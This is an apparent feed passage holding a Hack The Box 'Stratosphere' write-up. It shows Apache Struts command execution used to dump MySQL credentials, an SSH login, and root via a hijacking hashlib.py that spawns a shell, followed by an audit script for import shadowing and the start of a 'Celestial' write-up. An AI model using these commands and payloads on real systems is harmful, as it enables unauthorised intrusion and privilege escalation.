&lt;p&gt;It seems as though there is a MySQL database running on the server (note the &lt;code class=&quot;highlighter-rouge&quot;&gt;mysql&lt;/code&gt; account in &lt;code class=&quot;highlighter-rouge&quot;&gt;/etc/passwd&lt;/code&gt; and the credentials in &lt;code class=&quot;highlighter-rouge&quot;&gt;db_connect&lt;/code&gt;). We can enumerate it through the Apache Struts exploit: with the mysql client’s &lt;code class=&quot;highlighter-rouge&quot;&gt;-e&lt;/code&gt; parameter we can run queries non-interactively and receive their output on stdout. The &lt;code class=&quot;highlighter-rouge&quot;&gt;admin&lt;/code&gt;/&lt;code class=&quot;highlighter-rouge&quot;&gt;admin&lt;/code&gt; credentials from the &lt;code class=&quot;highlighter-rouge&quot;&gt;[users]&lt;/code&gt; section of &lt;code class=&quot;highlighter-rouge&quot;&gt;db_connect&lt;/code&gt; are used below.&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:~/htb/stratosphere/struts-pwn# python struts-pwn.py -u http://10.10.10.64/Monitoring/example/Welcome.action --cmd 'mysql --user=admin --password=admin  -e &quot;show databases;&quot;'

[*] URL: http://10.10.10.64/Monitoring/example/Welcome.action
[*] CMD: mysql --user=admin --password=admin  -e &quot;show databases;&quot;
[!] ChunkedEncodingError Error: Making another request to the url.
Refer to: https://github.com/mazen160/struts-pwn/issues/8 for help.
EXCEPTION::::--&amp;gt; ('Connection broken: IncompleteRead(0 bytes read)', IncompleteRead(0 bytes read))
Note: Server Connection Closed Prematurely

Database
information_schema
users

[%] Done.
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;&lt;em&gt;enumerating the tables within the mysql ‘users’ database&lt;/em&gt;&lt;/p&gt;
&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:~/htb/stratosphere/struts-pwn# python struts-pwn.py -u http://10.10.10.64/Monitoring/example/Welcome.action --cmd 'mysql --user=admin --password=admin  -e &quot;use users; show tables;&quot;'

[*] URL: http://10.10.10.64/Monitoring/example/Welcome.action
[*] CMD: mysql --user=admin --password=admin  -e &quot;use users; show tables;&quot;
[!] ChunkedEncodingError Error: Making another request to the url.
Refer to: https://github.com/mazen160/struts-pwn/issues/8 for help.
EXCEPTION::::--&amp;gt; ('Connection broken: IncompleteRead(0 bytes read)', IncompleteRead(0 bytes read))
Note: Server Connection Closed Prematurely

Tables_in_users
accounts

[%] Done.
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;&lt;em&gt;receiving the contents of the accounts table&lt;/em&gt;&lt;/p&gt;
&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:~/htb/stratosphere/struts-pwn# python struts-pwn.py -u http://10.10.10.64/Monitoring/example/Welcome.action --cmd 'mysql --user=admin --password=admin  -e &quot;use users; select * from users.accounts;&quot;'

[*] URL: http://10.10.10.64/Monitoring/example/Welcome.action
[*] CMD: mysql --user=admin --password=admin  -e &quot;use users; select * from users.accounts;&quot;
[!] ChunkedEncodingError Error: Making another request to the url.
Refer to: https://github.com/mazen160/struts-pwn/issues/8 for help.
EXCEPTION::::--&amp;gt; ('Connection broken: IncompleteRead(0 bytes read)', IncompleteRead(0 bytes read))
Note: Server Connection Closed Prematurely

fullName        password        username
Richard F. Smith        9tc*rhKuG5TyXvUJOrE^5CK7k       richard

[%] Done.
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;Attempting to &lt;em&gt;ssh&lt;/em&gt; into the box using the &lt;code class=&quot;highlighter-rouge&quot;&gt;richard&lt;/code&gt; account and the password &lt;code class=&quot;highlighter-rouge&quot;&gt;9tc*rhKuG5TyXvUJOrE^5CK7k&lt;/code&gt; from the MySQL database results in a successful login:&lt;/p&gt;
&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:~/htb/stratosphere/struts-pwn# ssh richard@10.10.10.64
The authenticity of host '10.10.10.64 (10.10.10.64)' can't be established.
ECDSA key fingerprint is SHA256:tQZo8j1TeVASPxWyDgqJf8PaDZJV/+LeeBZnjueAW/E.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.10.64' (ECDSA) to the list of known hosts.
richard@10.10.10.64's password:
Linux stratosphere 4.9.0-6-amd64 #1 SMP Debian 4.9.82-1+deb9u2 (2018-02-21) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Aug 31 12:57:51 2018 from 10.10.14.108
richard@stratosphere:~$ id
uid=1000(richard) gid=1000(richard) groups=1000(richard),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(lpadmin),116(scanner)
richard@stratosphere:~$ uname -a
Linux stratosphere 4.9.0-6-amd64 #1 SMP Debian 4.9.82-1+deb9u2 (2018-02-21) x86_64 GNU/Linux
richard@stratosphere:~$ cat user.txt
e610b...[snip]...
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;h2 id=&quot;privilege-escalation&quot;&gt;Privilege Escalation&lt;/h2&gt;

&lt;p&gt;Upon sshing into the box we see a script called &lt;code class=&quot;highlighter-rouge&quot;&gt;test.py&lt;/code&gt; (contents below), which seems to be some sort of a game where we need to find the plaintext for various hashes; at the end of the script we see a call to &lt;code class=&quot;highlighter-rouge&quot;&gt;os.system('/root/success.py')&lt;/code&gt;.
From the output of the &lt;code class=&quot;highlighter-rouge&quot;&gt;sudo -l&lt;/code&gt; command we also seem to be able to run the &lt;code class=&quot;highlighter-rouge&quot;&gt;test.py&lt;/code&gt; file as the root user.&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;richard@stratosphere:~$ sudo -l
Matching Defaults entries for richard on stratosphere:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User richard may run the following commands on stratosphere:
    (ALL) NOPASSWD: /usr/bin/python* /home/richard/test.py
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;&lt;em&gt;contents of test.py file&lt;/em&gt;&lt;/p&gt;
&lt;div class=&quot;language-python highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;n&quot;&gt;richard&lt;/span&gt;&lt;span class=&quot;nd&quot;&gt;@stratosphere&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;~&lt;/span&gt;&lt;span class=&quot;err&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;cat&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;test&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;py&lt;/span&gt;
&lt;span class=&quot;c&quot;&gt;#!/usr/bin/python3&lt;/span&gt;
&lt;span class=&quot;kn&quot;&gt;import&lt;/span&gt; &lt;span class=&quot;nn&quot;&gt;hashlib&lt;/span&gt;


&lt;span class=&quot;k&quot;&gt;def&lt;/span&gt; &lt;span class=&quot;nf&quot;&gt;question&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;():&lt;/span&gt;
    &lt;span class=&quot;n&quot;&gt;q1&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;input&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;Solve: 5af003e100c80923ec04d65933d382cb&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\n&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
    &lt;span class=&quot;n&quot;&gt;md5&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;hashlib&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;md5&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;()&lt;/span&gt;
    &lt;span class=&quot;n&quot;&gt;md5&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;update&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;q1&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;encode&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;())&lt;/span&gt;
    &lt;span class=&quot;k&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;ow&quot;&gt;not&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;md5&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;hexdigest&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;()&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;==&lt;/span&gt; &lt;span class=&quot;s&quot;&gt;&quot;5af003e100c80923ec04d65933d382cb&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;
        &lt;span class=&quot;k&quot;&gt;print&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;Sorry, that's not right&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
        &lt;span class=&quot;k&quot;&gt;return&lt;/span&gt;
    &lt;span class=&quot;k&quot;&gt;print&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;You got it!&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
    &lt;span class=&quot;n&quot;&gt;q2&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;input&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;Now what's this one? d24f6fb449855ff42344feff18ee2819033529ff&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\n&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
    &lt;span class=&quot;n&quot;&gt;sha1&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;hashlib&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;sha1&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;()&lt;/span&gt;
    &lt;span class=&quot;n&quot;&gt;sha1&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;update&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;q2&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;encode&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;())&lt;/span&gt;
    &lt;span class=&quot;k&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;ow&quot;&gt;not&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;sha1&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;hexdigest&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;()&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;==&lt;/span&gt; &lt;span class=&quot;s&quot;&gt;'d24f6fb449855ff42344feff18ee2819033529ff'&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;
        &lt;span class=&quot;k&quot;&gt;print&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;Nope, that one didn't work...&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
        &lt;span class=&quot;k&quot;&gt;return&lt;/span&gt;
    &lt;span class=&quot;k&quot;&gt;print&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;WOW, you're really good at this!&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
    &lt;span class=&quot;n&quot;&gt;q3&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;input&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;How about this? 91ae5fc9ecbca9d346225063f23d2bd9&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\n&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
    &lt;span class=&quot;n&quot;&gt;md4&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;hashlib&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;new&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;'md4'&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
    &lt;span class=&quot;n&quot;&gt;md4&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;update&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;q3&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;encode&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;())&lt;/span&gt;
    &lt;span class=&quot;k&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;ow&quot;&gt;not&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;md4&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;hexdigest&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;()&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;==&lt;/span&gt; &lt;span class=&quot;s&quot;&gt;'91ae5fc9ecbca9d346225063f23d2bd9'&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;
        &lt;span class=&quot;k&quot;&gt;print&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;Yeah, I don't think that's right.&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
        &lt;span class=&quot;k&quot;&gt;return&lt;/span&gt;
    &lt;span class=&quot;k&quot;&gt;print&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;OK, OK! I get it. You know how to crack hashes...&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
    &lt;span class=&quot;n&quot;&gt;q4&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;input&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;Last one, I promise: 9efebee84ba0c5e030147cfd1660f5f2850883615d444ceecf50896aae083ead798d13584f52df0179df0200a3e1a122aa738beff263b49d2443738eba41c943&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\n&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
    &lt;span class=&quot;n&quot;&gt;blake&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;hashlib&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;new&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;'BLAKE2b512'&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
    &lt;span class=&quot;n&quot;&gt;blake&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;update&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;q4&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;encode&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;())&lt;/span&gt;
    &lt;span class=&quot;k&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;ow&quot;&gt;not&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;blake&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;hexdigest&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;()&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;==&lt;/span&gt; &lt;span class=&quot;s&quot;&gt;'9efebee84ba0c5e030147cfd1660f5f2850883615d444ceecf50896aae083ead798d13584f52df0179df0200a3e1a122aa738beff263b49d2443738eba41c943'&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;
        &lt;span class=&quot;k&quot;&gt;print&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;You were so close! urg... sorry rules are rules.&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
        &lt;span class=&quot;k&quot;&gt;return&lt;/span&gt;

    &lt;span class=&quot;kn&quot;&gt;import&lt;/span&gt; &lt;span class=&quot;nn&quot;&gt;os&lt;/span&gt;
    &lt;span class=&quot;n&quot;&gt;os&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;system&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;'/root/success.py'&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
    &lt;span class=&quot;k&quot;&gt;return&lt;/span&gt;

&lt;span class=&quot;n&quot;&gt;question&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;()&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;Running all the hashes through JTR, we recover the following plaintexts:&lt;/p&gt;

&lt;table&gt;
  &lt;thead&gt;
    &lt;tr&gt;
      &lt;th style=&quot;text-align: center&quot;&gt;Algo&lt;/th&gt;
      &lt;th style=&quot;text-align: center&quot;&gt;Hash&lt;/th&gt;
      &lt;th style=&quot;text-align: center&quot;&gt;Plaintext&lt;/th&gt;
    &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
    &lt;tr&gt;
      &lt;td style=&quot;text-align: center&quot;&gt;MD5&lt;/td&gt;
      &lt;td style=&quot;text-align: center&quot;&gt;5af003e100c80923ec04d65933d382cb&lt;/td&gt;
      &lt;td style=&quot;text-align: center&quot;&gt;kaybboo!&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
      &lt;td style=&quot;text-align: center&quot;&gt;SHA1&lt;/td&gt;
      &lt;td style=&quot;text-align: center&quot;&gt;d24f6fb449855ff42344feff18ee2819033529ff&lt;/td&gt;
      &lt;td style=&quot;text-align: center&quot;&gt;ninjaabisshinobi&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
      &lt;td style=&quot;text-align: center&quot;&gt;MD4&lt;/td&gt;
      &lt;td style=&quot;text-align: center&quot;&gt;91ae5fc9ecbca9d346225063f23d2bd9&lt;/td&gt;
      &lt;td style=&quot;text-align: center&quot;&gt;legend72&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
      &lt;td style=&quot;text-align: center&quot;&gt;BLAKE2b512&lt;/td&gt;
      &lt;td style=&quot;text-align: center&quot;&gt;&lt;em&gt;hash redacted too long!&lt;/em&gt;&lt;/td&gt;
      &lt;td style=&quot;text-align: center&quot;&gt;Fhero6610&lt;/td&gt;
    &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;

&lt;p&gt;Successfully solving the challenge results in a &lt;code class=&quot;highlighter-rouge&quot;&gt;Permission denied&lt;/code&gt; on the &lt;code class=&quot;highlighter-rouge&quot;&gt;success.py&lt;/code&gt; script, so it seems that this may have been a false flag, and we need to do further enumeration for the proper priv. esc vector.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;solving test.py&lt;/em&gt;&lt;/p&gt;
&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;richard@stratosphere:~$ /usr/bin/python3 /home/richard/test.py
Solve: 5af003e100c80923ec04d65933d382cb
kaybboo!
You got it!
Now what's this one? d24f6fb449855ff42344feff18ee2819033529ff
ninjaabisshinobi
WOW, you're really good at this!
How about this? 91ae5fc9ecbca9d346225063f23d2bd9
legend72
OK, OK! I get it. You know how to crack hashes...
Last one, I promise: 9efebee84ba0c5e030147cfd1660f5f2850883615d444ceecf50896aae083ead798d13584f52df0179df0200a3e1a122aa738beff263b49d2443738eba41c943
Fhero6610
sh: 1: /root/success.py: Permission denied
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;h3 id=&quot;root-via-python-library-hijacking&quot;&gt;Root via Python Library Hijacking&lt;/h3&gt;
&lt;p&gt;After researching a bit about privilege escalations related to Python, you will come across the following blog post about how to escalate privileges through &lt;a href=&quot;https://rastating.github.io/privilege-escalation-via-python-library-hijacking/&quot;&gt;python library hijacking&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;If you are familiar with the concept of &lt;a href=&quot;https://attack.mitre.org/wiki/Technique/T1038&quot;&gt;DLL Search Order Hijacking&lt;/a&gt; on the Windows operating system, this is a similar concept: a module that appears earlier in the search path is loaded in place of the intended one.&lt;/p&gt;

&lt;p&gt;In order to exploit this vulnerability, all we have to do is create a Python module with the same name as one the target script imports, in the directory of the script we are attempting to run. Python puts the directory containing the script first on &lt;code class=&quot;highlighter-rouge&quot;&gt;sys.path&lt;/code&gt;, so a module there is found before the standard library copy. Since the &lt;code class=&quot;highlighter-rouge&quot;&gt;test.py&lt;/code&gt; script imports the &lt;code class=&quot;highlighter-rouge&quot;&gt;hashlib&lt;/code&gt; library, we create a &lt;code class=&quot;highlighter-rouge&quot;&gt;hashlib.py&lt;/code&gt; Python module next to it, which will be loaded in place of the original &lt;code class=&quot;highlighter-rouge&quot;&gt;hashlib&lt;/code&gt; module.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;contents of our hashlib.py python file&lt;/em&gt;&lt;/p&gt;
&lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;gp&quot;&gt;richard@stratosphere:~$ &lt;/span&gt;cat hashlib.py
import pty
pty.spawn&lt;span class=&quot;o&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;/bin/sh&quot;&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;
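&lt;p&gt;The condition abused above can be audited before a script is ever added to a sudo rule. The following is an added example, not code from the write-up or from the box: it parses the script's imports, checks whether any of them is already shadowed by a file in the script's directory, and checks whether a non-root user could write there. The &lt;code class=&quot;highlighter-rouge&quot;&gt;demo()&lt;/code&gt; function rebuilds the situation with constructed files in a temporary directory; the placeholder &lt;code class=&quot;highlighter-rouge&quot;&gt;hashlib.py&lt;/code&gt; it writes is inert.&lt;/p&gt;

```python
# Added example (not code from the write-up): audit a script that a sudo rule
# allows to run with elevated rights for Python import shadowing. Python places
# the directory containing the script at sys.path[0], so a file named like an
# imported module in that directory is loaded instead of the standard library.
import ast
import os
import stat
import tempfile


def imported_modules(source):
    """Top-level names of every module the script imports, nested imports
    included (test.py on the box does `import os` inside question())."""
    names = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            for alias in node.names:
                names.add(alias.name.split(".")[0])
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            names.add(node.module.split(".")[0])
    return names


def shadowing_files(script_dir, modules):
    """Map module name to the file or package in script_dir that would be
    imported in place of the real module."""
    found = {}
    for name in sorted(modules):
        for candidate in (name + ".py", os.path.join(name, "__init__.py")):
            path = os.path.join(script_dir, candidate)
            if os.path.exists(path):
                found[name] = path
                break
    return found


def writable_by_non_root(path):
    """True if a user other than root can drop a file into path: the directory
    is not owned by root, or its group/other write bits are set."""
    st = os.stat(path)
    mode = stat.filemode(st.st_mode)  # e.g. 'drwxrwxr-x'
    return st.st_uid != 0 or mode[5] == "w" or mode[8] == "w"


def audit_script(script_path):
    """Audit one script and report what an unprivileged user could influence."""
    with open(script_path) as fh:
        modules = imported_modules(fh.read())
    script_dir = os.path.dirname(os.path.abspath(script_path))
    return {
        "modules": sorted(modules),
        "shadowed": shadowing_files(script_dir, modules),
        "dir_writable_by_non_root": writable_by_non_root(script_dir),
    }


def demo():
    """Rebuild the write-up's layout in a temporary directory (constructed
    files, not copied from the box) and audit it."""
    workdir = tempfile.mkdtemp(prefix="strato_audit_")
    os.chmod(workdir, 0o775)  # group-writable, like a shared home directory
    script = os.path.join(workdir, "test.py")
    with open(script, "w") as fh:
        fh.write(
            "#!/usr/bin/python3\n"
            "import hashlib\n"
            "def question():\n"
            "    md5 = hashlib.md5()\n"
            "    import os\n"
            "    os.system('/root/success.py')\n"
            "question()\n"
        )
    # A file next to the script with the same name as a stdlib import. Its
    # contents are an inert placeholder; what matters is that sys.path[0]
    # finds it before the standard library.
    with open(os.path.join(workdir, "hashlib.py"), "w") as fh:
        fh.write("# placeholder module that would shadow the real hashlib\n")
    return audit_script(script)


if __name__ == "__main__":
    report = demo()
    for name, path in report["shadowed"].items():
        print(f"[!] import '{name}' resolves to {path} instead of the stdlib")
    if report["dir_writable_by_non_root"]:
        print("[!] script directory is writable by a non-root user")
```

Python 3.11 added the &lt;code class=&quot;highlighter-rouge&quot;&gt;-P&lt;/code&gt; flag and the &lt;code class=&quot;highlighter-rouge&quot;&gt;PYTHONSAFEPATH&lt;/code&gt; environment variable, which keep the script directory off &lt;code class=&quot;highlighter-rouge&quot;&gt;sys.path&lt;/code&gt; and close this vector on interpreters that support them.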

&lt;p&gt;&lt;img src=&quot;https://i.imgur.com/UqZHqhR.png&quot; alt=&quot;&amp;quot;Getting Root&amp;quot;&quot; title=&quot;Getting Root&quot; /&gt;&lt;/p&gt;</content><author><name>A Medic (@OnlyaMedic)</name></author><category term="writeup" /><category term="pentesting" /><category term="hackthebox" /><category term="python" /><category term="struts" /></entry><entry><title type="html">Hack the Box - Celestial Write up</title><link href="https://dastinia.io/write-up/hackthebox/2018/08/25/hackthebox-celestial-writeup/" rel="alternate" type="text/html" title="Hack the Box - Celestial Write up" /><published>2018-08-25T00:00:00-04:00</published><updated>2018-08-25T00:00:00-04:00</updated><id>https://dastinia.io/write-up/hackthebox/2018/08/25/hackthebox-celestial-writeup</id><content type="html" xml:base="https://dastinia.io/write-up/hackthebox/2018/08/25/hackthebox-celestial-writeup/">&lt;p align=&quot;center&quot;&gt;
&lt;img src=&quot;https://dastinia.io/assets/images/htb/celestial/1.png&quot; alt=&quot;celestial&quot; /&gt;
&lt;/p&gt;

&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;/h2&gt;

&lt;p&gt;Celestial was an interesting but very straightforward box. I personally believe Celestial was a good HTB box for learning how to perform quick research to tackle a specific vulnerability in an application that you may not encounter often. As one of the first boxes I completed when I first joined HTB, it’s sad to see it go.&lt;/p&gt;

&lt;h2 id=&quot;tools-used&quot;&gt;Tools Used&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;a href=&quot;https://nmap.org/&quot;&gt;Nmap&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://portswigger.net/&quot;&gt;BurpSuite&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://github.com/craSH/socat&quot;&gt;socat&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h2 id=&quot;enumeration&quot;&gt;Enumeration&lt;/h2&gt;

&lt;h3 id=&quot;initial-scanning&quot;&gt;Initial Scanning&lt;/h3&gt;

&lt;p&gt;Like with every HTB machine, let’s begin with an nmap scan against &lt;em&gt;Celestial&lt;/em&gt; (10.10.10.85)&lt;/p&gt;

